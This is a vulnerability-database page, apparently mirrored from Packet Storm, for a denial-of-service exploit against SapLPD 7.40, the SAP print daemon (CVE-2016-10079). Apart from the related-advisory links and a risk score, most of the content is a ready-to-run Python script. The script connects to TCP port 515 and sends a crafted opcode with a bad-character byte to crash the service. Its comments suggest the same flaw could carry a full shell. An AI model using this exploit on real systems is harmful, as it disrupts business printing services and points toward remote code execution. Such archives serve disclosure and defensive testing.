Lucene search
K

SapLPD 7.4.0 Denial Of Service

🗓️ 13 Jan 2017 00:00:00Reported by Peter BarisType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 50 Views

SapLPD 7.4.0 Denial Of Service exploit targeting version 7.40 on Windows O

Related
Code
ReporterTitlePublishedViews
Family
CNVD
SAP SapLPD Denial of Service Vulnerability
6 Feb 201700:00
cnvd
CVE
CVE-2016-10079
1 Feb 201719:00
cve
Cvelist
CVE-2016-10079
1 Feb 201719:00
cvelist
NVD
CVE-2016-10079
1 Feb 201719:59
nvd
Prion
Denial of service
1 Feb 201719:59
prion
`# Exploit Title: SAPlpd 7.40 Denial of Service  
# Date: 2016-12-28  
# Exploit Author: Peter Baris  
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip  
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)   
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64  
  
  
import socket  
  
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah  
# So you can modify the DoS accordingly  
# The added 800 A's are just to show, that you can deliver a complete shell with the command  
  
DoS = ("\x03"+"\x0a"+"\x41"*800)  
  
  
s = socket.socket()  
s.settimeout(1)  
s.connect(('192.168.198.132', 515))  
print("[*] Crashing SAPlpd 7.40")  
print("[*] Payload length: "+str(len(DoS))+" bytes")  
s.send(DoS)  
s.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jan 2017 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.13933
50